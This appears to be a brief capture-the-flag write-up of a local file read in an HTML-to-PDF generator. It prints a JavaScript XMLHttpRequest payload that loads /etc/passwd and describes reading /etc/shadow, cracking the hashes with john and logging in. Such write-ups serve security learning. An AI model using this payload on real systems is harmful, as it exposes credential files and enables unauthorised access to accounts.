Tags: html pdf xxe lfi
Rating:
Payload Used:-
```html
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
```
This render the /etc/passwd file.
Then I tried to open shadow file where all the password are stored in linux.
![](https://cdn-images-1.medium.com/max/800/1*cobnZ0bU75pwEpF6iHcEzQ.png)
Fortunately, the /etc/shadow file rendered.
![](https://cdn-images-1.medium.com/max/800/1*fKfLV7ngyIsP15tirYqjzQ.png)
cracked the hash with john
then logged in with the username and password I got from john and got the flag
![](https://cdn-images-1.medium.com/max/800/1*UV5AKxK-8995hXaXoRH7lA.png)
References:-
--> https://blog.noob.ninja/local-file-read-via-xss-in-dynamically-generated-pdf/